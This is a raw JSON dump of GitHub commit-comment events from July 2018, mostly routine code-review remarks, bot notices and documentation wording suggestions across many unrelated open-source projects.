{"id":"7929668983","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/perl-feedstock"},"payload":{"comment":{"id":29623279,"position":null,"line":null,"path":null,"commit_id":"a855188b389cbfe26172208cab3041202722aedb","created_at":"2018-07-06T15:50:03Z","updated_at":"2018-07-06T15:50:03Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-06T15:50:03Z"}
{"id":"7929676503","type":"CommitCommentEvent","actor":{"login":"bonidjukic"},"repo":{"name":"learningequality/velox"},"payload":{"comment":{"id":29623297,"position":null,"line":null,"path":null,"commit_id":"f9e58c697660308f811945c28c0162998fc6b722","created_at":"2018-07-06T15:51:37Z","updated_at":"2018-07-06T15:51:37Z","author_association":"CONTRIBUTOR","body":"@jredrejo wouldn't it be better to extract this logic to `utils` module function and then use that to get the identifier?"}},"created_at":"2018-07-06T15:51:37Z"}
{"id":"7929677215","type":"CommitCommentEvent","actor":{"login":"andrea-guarino-sonarsource"},"repo":{"name":"SonarSource/slang"},"payload":{"comment":{"id":29623298,"position":35,"line":690,"path":"sonar-slang-plugin/src/test/java/com/sonarsource/slang/kotlin/KotlinConverterTest.java","commit_id":"5775a6dded2dffa905b1475a99a10eb3eb2d49e7","created_at":"2018-07-06T15:51:46Z","updated_at":"2018-07-06T15:51:46Z","author_association":"CONTRIBUTOR","body":"yes, it's here https://github.com/SonarSource/slang/pull/142/commits/7600152faaccadbccf141dcf996745b4353c5c9f#diff-8a61d737ed032f7596e0c488fa5dd66cR684"}},"created_at":"2018-07-06T15:51:46Z"}
{"id":"7929677951","type":"CommitCommentEvent","actor":{"login":"KawKaw88"},"repo":{"name":"KawKaw88/website-couresra-github"},"payload":{"comment":{"id":29623300,"position":null,"line":null,"path":null,"commit_id":"4954db70fd8138e25a007b7be16cc40d7a1997ea","created_at":"2018-07-06T15:51:55Z","updated_at":"2018-07-06T15:51:55Z","author_association":"OWNER","body":"Associating with #3 with this commit."}},"created_at":"2018-07-06T15:51:55Z"}
{"id":"7929680833","type":"CommitCommentEvent","actor":{"login":"jselt"},"repo":{"name":"radcampaign/rad-new"},"payload":{"comment":{"id":29623308,"position":null,"line":null,"path":null,"commit_id":"18ab75c1e1af16b8d22345f21333f5af4201521a","created_at":"2018-07-06T15:52:32Z","updated_at":"2018-07-06T15:52:32Z","author_association":"MEMBER","body":"Created multidev environment [rad-new#pr-2](https://dashboard.pantheon.io/sites/a0f7976a-d5a5-49c8-b64a-9c7ca3ce2c18#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-rad-new.pantheonsite.io/)"}},"created_at":"2018-07-06T15:52:32Z"}
{"id":"7929683419","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623313,"position":315,"line":787,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T15:53:05Z","updated_at":"2018-07-06T15:53:05Z","author_association":"CONTRIBUTOR","body":"The output in this code block is what is returned when using the sysrc command. That's why it is in a code-block. \r\nThere are 2 examples provided here, what happens if sshd_enable is already set to NO and what happens if already set to YES. \r\nMaybe explain that a bit better? \r\n\"If there is no existing entry or sshd_enable is already set to NO:\" \r\n(no entry or NO is set to YES)\r\nand\r\n\"If sshd_enable is already set to YES:\"\r\n(If already YES, it stays YES)\r\n\r\nI'm OK with removing the second example, but even if there is only 1 example, it needs to be explained a touch more."}},"created_at":"2018-07-06T15:53:05Z"}
{"id":"7929683904","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-remote-debugger"},"payload":{"comment":{"id":29623314,"position":8,"line":91,"path":"lib/remote-debugger-message-handler.js","commit_id":"68d39e2b8160e84060421ae06b032e30be396c86","created_at":"2018-07-06T15:53:10Z","updated_at":"2018-07-06T15:53:10Z","author_association":"CONTRIBUTOR","body":"Can we show the whole `JSON.stringify(plist)` or it would be an overkill?"}},"created_at":"2018-07-06T15:53:10Z"}
{"id":"7929684515","type":"CommitCommentEvent","actor":{"login":"georgringer"},"repo":{"name":"georgringer/news"},"payload":{"comment":{"id":29623316,"position":null,"line":null,"path":null,"commit_id":"b73b1db92fbe45a2c396ca4a86840ee0f2dfb377","created_at":"2018-07-06T15:53:18Z","updated_at":"2018-07-06T15:53:18Z","author_association":"OWNER","body":"Wanna make a pr? "}},"created_at":"2018-07-06T15:53:18Z"}
{"id":"7929684818","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29623319,"position":null,"line":null,"path":null,"commit_id":"d95ea7bc87bef636b2fe11d158878c3ad68c88b9","created_at":"2018-07-06T15:53:21Z","updated_at":"2018-07-06T15:53:21Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-751](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-751).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-751-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T15:53:21Z"}
{"id":"7929688349","type":"CommitCommentEvent","actor":{"login":"zbruhnke"},"repo":{"name":"HVF/prelaunchr"},"payload":{"comment":{"id":29623327,"position":null,"line":null,"path":null,"commit_id":"76ba109caaf9bda8f1c59fed99e8249f97bf0547","created_at":"2018-07-06T15:54:08Z","updated_at":"2018-07-06T15:54:08Z","author_association":"COLLABORATOR","body":"Oh and the Copy link button now actually works!"}},"created_at":"2018-07-06T15:54:08Z"}
{"id":"7929688590","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29623328,"position":14,"line":512,"path":"src/agreement/mod.rs","commit_id":"b2a65fe08483fbe8c24cd47d2cb48263cabed027","created_at":"2018-07-06T15:54:10Z","updated_at":"2018-07-06T15:54:10Z","author_association":"CONTRIBUTOR","body":"Maybe these three lines should be part of a general \"`Step::extend`\" method. Later, that method would also take the union of the two sets of messages, and the two sets of fault logs. So this would look something like:\r\n\r\n```rust\r\nself.step.extend(step);\r\n```"}},"created_at":"2018-07-06T15:54:10Z"}
{"id":"7929689075","type":"CommitCommentEvent","actor":{"login":"luriel-xyz"},"repo":{"name":"luriel-xyz/Tekfix"},"payload":{"comment":{"id":29623330,"position":null,"line":null,"path":null,"commit_id":"0d6ba1c0dcae144375c3a62eb0e312db4799fedd","created_at":"2018-07-06T15:54:15Z","updated_at":"2018-07-06T15:54:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Welcome Screen](https://trello.com/c/1xOKQzKK/3-welcome-screen)"}},"created_at":"2018-07-06T15:54:15Z"}
{"id":"7929689098","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29623331,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T15:54:15Z","updated_at":"2018-07-06T15:54:15Z","author_association":"OWNER","body":"We are close to a release, yay! :wink: :duck: "}},"created_at":"2018-07-06T15:54:15Z"}
{"id":"7929690080","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623333,"position":320,"line":790,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T15:54:27Z","updated_at":"2018-07-06T15:54:27Z","author_association":"CONTRIBUTOR","body":"s/sshd/sshd_enable/\r\n\r\nan \"sshd entry\" doesn't make sense."}},"created_at":"2018-07-06T15:54:27Z"}
{"id":"7929690577","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29623337,"position":null,"line":null,"path":null,"commit_id":"343f4e64ef1ce6eb5e0b99642b57cb0e0da3f21e","created_at":"2018-07-06T15:54:33Z","updated_at":"2018-07-06T15:54:33Z","author_association":"CONTRIBUTOR","body":"@Etaglibash en el juego no carga esa etiqueta, sale en ingles si lo pones así.."}},"created_at":"2018-07-06T15:54:33Z"}
{"id":"7929692398","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29623340,"position":6,"line":6,"path":"samples/code/multi-project-builds/groovy-dsl/build.gradle","commit_id":"6965b08956613a19f108edbe215eb0fd3bb32abe","created_at":"2018-07-06T15:54:55Z","updated_at":"2018-07-06T15:54:55Z","author_association":"MEMBER","body":"Should this sample not be using the `plugins {}` block?"}},"created_at":"2018-07-06T15:54:55Z"}
{"id":"7929699877","type":"CommitCommentEvent","actor":{"login":"ondrejmirtes"},"repo":{"name":"nextras/orm-phpstan"},"payload":{"comment":{"id":29623358,"position":54,"line":54,"path":"src/Types/RepositoryReturnTypeExtension.php","commit_id":"a83ba39e894c8e9cf4734994a7c9661440ac9627","created_at":"2018-07-06T15:56:24Z","updated_at":"2018-07-06T15:56:24Z","author_association":"NONE","body":"`instanceof TypeWithClassName` by bylo trochu obecnejsi."}},"created_at":"2018-07-06T15:56:24Z"}
{"id":"7929700815","type":"CommitCommentEvent","actor":{"login":"bbrewington"},"repo":{"name":"Data4Democracy/disinfo-campaigns"},"payload":{"comment":{"id":29623361,"position":null,"line":null,"path":null,"commit_id":"89a8c977336928cffc0fde486be0697e5b4d796d","created_at":"2018-07-06T15:56:36Z","updated_at":"2018-07-06T15:56:36Z","author_association":"NONE","body":"Fixes #4 "}},"created_at":"2018-07-06T15:56:36Z"}
{"id":"7929702278","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29623365,"position":58,"line":770,"path":"contents/index.adoc","commit_id":"3849d13bc60cbe523d035fdf740a180ca2791a56","created_at":"2018-07-06T15:56:53Z","updated_at":"2018-07-06T15:56:53Z","author_association":"MEMBER","body":"I have no idea what this section is trying to say (from \"However there are some subtleties...\"). Could someone please explain? I think it needs some work to make it clearer for readers."}},"created_at":"2018-07-06T15:56:53Z"}
{"id":"7929705914","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29623376,"position":80,"line":792,"path":"contents/index.adoc","commit_id":"3849d13bc60cbe523d035fdf740a180ca2791a56","created_at":"2018-07-06T15:57:39Z","updated_at":"2018-07-06T15:57:39Z","author_association":"MEMBER","body":"Are you saying that _configure on demand_ is not recommended generally? Or not recommended if you're using Kotlin DSL?"}},"created_at":"2018-07-06T15:57:39Z"}
{"id":"7929706299","type":"CommitCommentEvent","actor":{"login":"ondrejmirtes"},"repo":{"name":"nextras/orm-phpstan"},"payload":{"comment":{"id":29623379,"position":114,"line":114,"path":"src/Types/RepositoryReturnTypeExtension.php","commit_id":"a83ba39e894c8e9cf4734994a7c9661440ac9627","created_at":"2018-07-06T15:57:44Z","updated_at":"2018-07-06T15:57:44Z","author_association":"NONE","body":"Cely vnitrek toho ifu bys mel nahradit `$scope->getType($return->expr);` a zkontrolovat, ze ti to vraci `ConstantArrayType` s jednou polozkou a to `ConstantStringType` 😊"}},"created_at":"2018-07-06T15:57:44Z"}
{"id":"7929709821","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623386,"position":345,"line":886,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T15:58:28Z","updated_at":"2018-07-06T15:58:28Z","author_association":"CONTRIBUTOR","body":"Not sure why this was split into 2 sentences and then needing to use \"It\".\r\n\r\nOne example is transmission, a plugin that stores data using BitTorrent.\r\nreads better than\r\nOne example is transmission. It is a plugin that stores data using BitTorrent."}},"created_at":"2018-07-06T15:58:28Z"}
{"id":"7929710963","type":"CommitCommentEvent","actor":{"login":"trevorlang"},"repo":{"name":"nasa/earthdata-search"},"payload":{"comment":{"id":29623391,"position":5,"line":33,"path":"app/assets/stylesheets/modules/modal.css.scss","commit_id":"2f11893332718f2d7d87b64a3fd5a37895b89eea","created_at":"2018-07-06T15:58:42Z","updated_at":"2018-07-06T15:58:42Z","author_association":"COLLABORATOR","body":"Good eye. Old habits die hard. This probably wont be the last time :)"}},"created_at":"2018-07-06T15:58:42Z"}
{"id":"7929715727","type":"CommitCommentEvent","actor":{"login":"arturi"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29623409,"position":null,"line":null,"path":null,"commit_id":"f96be269d41ed635aaddcc4c7cb93dfc1610bb60","created_at":"2018-07-06T15:59:42Z","updated_at":"2018-07-06T15:59:42Z","author_association":"COLLABORATOR","body":"Thank you 👍"}},"created_at":"2018-07-06T15:59:42Z"}
{"id":"7929716255","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29623410,"position":391,"line":782,"path":"contents/index.adoc","commit_id":"f7786b7469341f99f9cd39aad43659d67d268d98","created_at":"2018-07-06T15:59:49Z","updated_at":"2018-07-06T15:59:49Z","author_association":"MEMBER","body":"Is this true? I thought Groovy generated methods that enables you to call them with only the required (non-default) parameters. Is that not the case?"}},"created_at":"2018-07-06T15:59:49Z"}
{"id":"7929720282","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29623425,"position":408,"line":799,"path":"contents/index.adoc","commit_id":"f7786b7469341f99f9cd39aad43659d67d268d98","created_at":"2018-07-06T16:00:35Z","updated_at":"2018-07-06T16:00:35Z","author_association":"MEMBER","body":"I think I removed this line because it doesn't really help. The big question I have is why would you _not_ always use `delegateClosureOf<T>()`?"}},"created_at":"2018-07-06T16:00:35Z"}
{"id":"7929721710","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29623427,"position":4,"line":552,"path":"mandelbulber2/src/fractal_list.cpp","commit_id":"34d2e48564e85644e66309e08308c0ff42e367ec","created_at":"2018-07-06T16:00:52Z","updated_at":"2018-07-06T16:00:52Z","author_association":"OWNER","body":"@mclarekin Forget about my comment. Now I see what is going on. When is analyticFunctionNone it can work with analytic linear and analytic logarithmic functions. It is very good solution!"}},"created_at":"2018-07-06T16:00:52Z"}
{"id":"7929721929","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623429,"position":361,"line":896,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:00:54Z","updated_at":"2018-07-06T16:00:54Z","author_association":"CONTRIBUTOR","body":"get rid of \"In\"\r\ns/In the :guilabel:`Mount points` section/The :guilabel:`Mount points` section/"}},"created_at":"2018-07-06T16:00:54Z"}
{"id":"7929725578","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29623437,"position":null,"line":null,"path":null,"commit_id":"343f4e64ef1ce6eb5e0b99642b57cb0e0da3f21e","created_at":"2018-07-06T16:01:35Z","updated_at":"2018-07-06T16:01:35Z","author_association":"CONTRIBUTOR","body":"![asd](https://user-images.githubusercontent.com/34174168/42388680-48bd6786-8114-11e8-8588-da8724f6202b.png)\r\n\r\n"}},"created_at":"2018-07-06T16:01:35Z"}
{"id":"7929727404","type":"CommitCommentEvent","actor":{"login":"PaulNeumann"},"repo":{"name":"PaulNeumann/vagrant-boxes"},"payload":{"comment":{"id":29623442,"position":6,"line":24,"path":"OracleDatabase/12.2.0.1/Vagrantfile","commit_id":"b86d0d2e1083a4a896935c1a7f83af9e3be3b105","created_at":"2018-07-06T16:01:59Z","updated_at":"2018-07-06T16:01:59Z","author_association":"OWNER","body":"If the decision is to proceed with setting the VM time zone based on the host time zone where possible, the following seems to work:\r\n\r\n```ruby\r\n# get host time zone for setting VM time zone, if possible\r\n# can override in env section below\r\noffset_sec = Time.now.gmt_offset\r\nif (offset_sec % (60 * 60)) == 0\r\n  offset_hr = ((offset_sec / 60) / 60)\r\n  timezone_suffix = offset_hr >= 0 ? \"-#{offset_hr.to_s}\" : \"+#{(-offset_hr).to_s}\"\r\n  SYSTEM_TIMEZONE = 'Etc/GMT' + timezone_suffix\r\nelse\r\n  # if host time zone isn't an integer hour offset, fall back to UTC\r\n  SYSTEM_TIMEZONE = 'UTC'\r\nend\r\n```"}},"created_at":"2018-07-06T16:01:59Z"}
{"id":"7929731170","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29623456,"position":41,"line":3631,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"87ab05856d97af56526343bcee03fbda2c88b3ad","created_at":"2018-07-06T16:02:46Z","updated_at":"2018-07-06T16:02:46Z","author_association":"COLLABORATOR","body":"No, it is supposed to take more suffixes. Like birdemde = bir anda, birdemdin = bir andan etc."}},"created_at":"2018-07-06T16:02:46Z"}
{"id":"7929736066","type":"CommitCommentEvent","actor":{"login":"FreezingSnail"},"repo":{"name":"FreezingSnail/JelliBoi"},"payload":{"comment":{"id":29623470,"position":null,"line":null,"path":null,"commit_id":"8a8126f5e998dc2a7d51b1bde753e2092c7520a6","created_at":"2018-07-06T16:03:50Z","updated_at":"2018-07-06T16:03:50Z","author_association":"OWNER","body":"Resets entities after a new game starts"}},"created_at":"2018-07-06T16:03:50Z"}
{"id":"7929736270","type":"CommitCommentEvent","actor":{"login":"radious"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29623471,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-06T16:03:53Z","updated_at":"2018-07-06T16:03:53Z","author_association":"NONE","body":"This is breaking spacemacs for me as I end up with two different PATH entries in ~/.spacemacs.d/.spacemacs.env, the one generated with zsh -ic is shorter and misses some folders."}},"created_at":"2018-07-06T16:03:53Z"}
{"id":"7929736822","type":"CommitCommentEvent","actor":{"login":"jorge1298"},"repo":{"name":"Chicoritos/iccproyectos"},"payload":{"comment":{"id":29623472,"position":2,"line":2,"path":"README.md","commit_id":"107d9b52f998b4ba09e23540368a32677c5bff9d","created_at":"2018-07-06T16:04:00Z","updated_at":"2018-07-06T16:04:00Z","author_association":"NONE","body":"dia = int(input(\"Ingrese el dia ( 1=Lunes, 2=Martes . . 7=Domingo): \"))\r\ndia_texto = 'Dato no valido'\r\nif dia == 1:\r\n dia_texto = 'Lunes'\r\nelif dia == 2:\r\n dia_texto = 'Martes'\r\nelif dia == 3:\r\n dia_texto = 'Miercoles'\r\nelif dia == 4:\r\n dia_texto = 'Jueves'\r\nelif dia == 5:\r\n dia_texto = 'Viernes'\r\nelif dia == 6:\r\n dia_texto = 'Sabado'\r\nelif dia == 7:\r\n dia_texto = 'Domingo'\r\n print(\"El dia de la semana es: \", dia_texto)"}},"created_at":"2018-07-06T16:04:00Z"}
{"id":"7929739540","type":"CommitCommentEvent","actor":{"login":"trevorlang"},"repo":{"name":"nasa/earthdata-search"},"payload":{"comment":{"id":29623480,"position":39,"line":82,"path":"app/assets/stylesheets/modules/modal.css.scss","commit_id":"2f11893332718f2d7d87b64a3fd5a37895b89eea","created_at":"2018-07-06T16:04:35Z","updated_at":"2018-07-06T16:04:35Z","author_association":"COLLABORATOR","body":"I don't think there would be an alternative in this case, as the overlay is being positioned over the standard modal content. This was done intentionally to allow the display of the info _over_ the list, which most importantly lets us keep scroll position and one day maybe get some slick google-esqe animations going.\r\n\r\nI feel like the use of it here should be benign as it is directly mirroring the styles of the main `.modal-body` styles."}},"created_at":"2018-07-06T16:04:35Z"}
{"id":"7929740491","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623482,"position":376,"line":921,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:04:46Z","updated_at":"2018-07-06T16:04:46Z","author_association":"CONTRIBUTOR","body":"Not sure why the info about the Create Directory option was removed."}},"created_at":"2018-07-06T16:04:46Z"}
{"id":"7929746719","type":"CommitCommentEvent","actor":{"login":"jsdevel"},"repo":{"name":"vpulim/node-soap"},"payload":{"comment":{"id":29623492,"position":null,"line":null,"path":null,"commit_id":"d6d22c9209a7b2ebbc85e98b7a1a0a3cddb13ea1","created_at":"2018-07-06T16:06:07Z","updated_at":"2018-07-06T16:06:07Z","author_association":"COLLABORATOR","body":"@qwelias i appreciate the concern.  None of the existing tests needed to be changed (afaik).  We usually strive to maintain back compat.  Are you seeing an issue on your end?"}},"created_at":"2018-07-06T16:06:07Z"}
{"id":"7929747970","type":"CommitCommentEvent","actor":{"login":"jselt"},"repo":{"name":"radcampaign/rad-new"},"payload":{"comment":{"id":29623498,"position":null,"line":null,"path":null,"commit_id":"46d91276e3489314cc3609d28c85ef1325a621ce","created_at":"2018-07-06T16:06:23Z","updated_at":"2018-07-06T16:06:23Z","author_association":"MEMBER","body":"Created multidev environment [rad-new#ci-21](https://dashboard.pantheon.io/sites/a0f7976a-d5a5-49c8-b64a-9c7ca3ce2c18#ci-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-21-rad-new.pantheonsite.io/)"}},"created_at":"2018-07-06T16:06:23Z"}
{"id":"7929758748","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29623517,"position":null,"line":null,"path":null,"commit_id":"85d2fa75c9c7001ca189eb63aeae51b5a90c35b2","created_at":"2018-07-06T16:08:42Z","updated_at":"2018-07-06T16:08:42Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-7-d8train.pantheonsite.io/)\n\nCreated multidev environment [pr-7](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#pr-7) for d8train."}},"created_at":"2018-07-06T16:08:42Z"}
{"id":"7929762204","type":"CommitCommentEvent","actor":{"login":"KratosUnleashed"},"repo":{"name":"KratosUnleashed/Mine"},"payload":{"comment":{"id":29623522,"position":null,"line":null,"path":null,"commit_id":"d9b1877865b9df3e8ef81edc786a8fc6056094cf","created_at":"2018-07-06T16:09:24Z","updated_at":"2018-07-06T16:09:24Z","author_association":"OWNER","body":"nothing"}},"created_at":"2018-07-06T16:09:24Z"}
{"id":"7929762932","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-frontend"},"payload":{"comment":{"id":29623524,"position":105,"line":67,"path":"assets/templates/blog_mainpage.html","commit_id":"b94b286519abdcad4d8f1056e5df97faacfd233d","created_at":"2018-07-06T16:09:33Z","updated_at":"2018-07-06T16:09:33Z","author_association":"MEMBER","body":"Če že imamo jQuery, bi ga blo fajn tukej uporabit (<IE8 recimo nardi weird shit z document.getElementById)"}},"created_at":"2018-07-06T16:09:33Z"}
{"id":"7929765102","type":"CommitCommentEvent","actor":{"login":"dwidder"},"repo":{"name":"CMUSTRUDEL/cmustrudel.github.io"},"payload":{"comment":{"id":29623527,"position":null,"line":null,"path":null,"commit_id":"71440448d5f9ba4e07d5bbd1187fc4a6cc69ec32","created_at":"2018-07-06T16:10:01Z","updated_at":"2018-07-06T16:10:01Z","author_association":"CONTRIBUTOR","body":"Wow I managed to commit to the lab website **without breaking the build**. I should get a badge for this."}},"created_at":"2018-07-06T16:10:01Z"}
{"id":"7929771859","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29623536,"position":null,"line":null,"path":null,"commit_id":"5db81d74d46bf0025ea51f1bb451ec586a496559","created_at":"2018-07-06T16:11:23Z","updated_at":"2018-07-06T16:11:23Z","author_association":"COLLABORATOR","body":"Puzzle `1121-eb4ead73` disappeared from [`src/main/java/com/zerocracy/pmo/People.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/People.java), that's why I closed #1267. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-06T16:11:23Z"}
{"id":"7929776379","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-frontend"},"payload":{"comment":{"id":29623542,"position":78,"line":40,"path":"assets/templates/blog_mainpage.html","commit_id":"b94b286519abdcad4d8f1056e5df97faacfd233d","created_at":"2018-07-06T16:12:18Z","updated_at":"2018-07-06T16:12:18Z","author_association":"MEMBER","body":"Zarad preglednosti bi bil kle skoraj boljši dictionary in ne if (predlagam da v scripts/3_util.js, kjer so ponavad take stvari, tud recimo JsonStatus)"}},"created_at":"2018-07-06T16:12:18Z"}
{"id":"7929778806","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623548,"position":387,"line":955,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T16:12:49Z","updated_at":"2018-07-06T16:12:49Z","author_association":"CONTRIBUTOR","body":"This is asking the user to decide if the jail _should_ have access to existing data or if new storage _should_ be set up for the jail to use. I see why \"will have\" was changed to \"has\" and \"will be\" was changed to \"is\" but the sentence doesn't make sense starting with Decide. To keep this change, I'd say change Decide to Determine. \r\n "}},"created_at":"2018-07-06T16:12:49Z"}
{"id":"7929779201","type":"CommitCommentEvent","actor":{"login":"xarkes"},"repo":{"name":"securitykitten/cutter_scripts"},"payload":{"comment":{"id":29623549,"position":73,"line":73,"path":"scripts/cutter_stackstrings.py","commit_id":"a3d9c6820e1c231cbd58049dda5f374c9862df31","created_at":"2018-07-06T16:12:53Z","updated_at":"2018-07-06T16:12:53Z","author_association":"NONE","body":"FYI you can use `cutter.cmdj` to avoir the `json.loads`."}},"created_at":"2018-07-06T16:12:53Z"}
{"id":"7929784395","type":"CommitCommentEvent","actor":{"login":"testingtestingwantwothree"},"repo":{"name":"MorgVerd/USB-Copier"},"payload":{"comment":{"id":29623557,"position":null,"line":null,"path":null,"commit_id":"de264c6ad9c53ccdb7db6482964568da5dace9b2","created_at":"2018-07-06T16:13:57Z","updated_at":"2018-07-06T16:13:57Z","author_association":"NONE","body":"(Not actually my IP, A test VPN's)"}},"created_at":"2018-07-06T16:13:57Z"}
{"id":"7929787356","type":"CommitCommentEvent","actor":{"login":"streetrat"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29623562,"position":null,"line":null,"path":null,"commit_id":"fe7dd912edc47e75187617f9e1f590c3483262a8","created_at":"2018-07-06T16:14:36Z","updated_at":"2018-07-06T16:14:36Z","author_association":"NONE","body":"thanks 4 commit"}},"created_at":"2018-07-06T16:14:36Z"}
{"id":"7929787996","type":"CommitCommentEvent","actor":{"login":"DefaltSimon"},"repo":{"name":"eLedina/eLedina-frontend"},"payload":{"comment":{"id":29623565,"position":4,"line":35,"path":"assets/templates/blog_writingpage.html","commit_id":"b94b286519abdcad4d8f1056e5df97faacfd233d","created_at":"2018-07-06T16:14:44Z","updated_at":"2018-07-06T16:14:44Z","author_association":"MEMBER","body":"Tole je bug: content bo vedno isti (najverjetneje prazen) ker ga zajame, ko se stran naloži - premakni noter v funkcijo."}},"created_at":"2018-07-06T16:14:44Z"}
{"id":"7929788265","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"snooplog4/chatarang"},"payload":{"comment":{"id":29623566,"position":null,"line":null,"path":null,"commit_id":"c96b2e553ba923cc72504467adb5a06804c2c5da","created_at":"2018-07-06T16:14:47Z","updated_at":"2018-07-06T16:14:47Z","author_association":"NONE","body":"Good job using CSS in JS.\r\n"}},"created_at":"2018-07-06T16:14:47Z"}
{"id":"7929789016","type":"CommitCommentEvent","actor":{"login":"ibuprophen1"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29623567,"position":null,"line":null,"path":null,"commit_id":"cf8a1c2a8833d61c234cade6e4e2646ea52e9b6c","created_at":"2018-07-06T16:14:57Z","updated_at":"2018-07-06T16:14:57Z","author_association":"NONE","body":"🤗!!! "}},"created_at":"2018-07-06T16:14:57Z"}
{"id":"7929789639","type":"CommitCommentEvent","actor":{"login":"mmoskal"},"repo":{"name":"Microsoft/pxt-common-packages"},"payload":{"comment":{"id":29623570,"position":179,"line":179,"path":"libs/mixer/melody.ts","commit_id":"d9dc9c7011af86c45af907476a734a8eea740c66","created_at":"2018-07-06T16:15:06Z","updated_at":"2018-07-06T16:15:06Z","author_association":"MEMBER","body":"@riknoll does this look reasonable?"}},"created_at":"2018-07-06T16:15:06Z"}
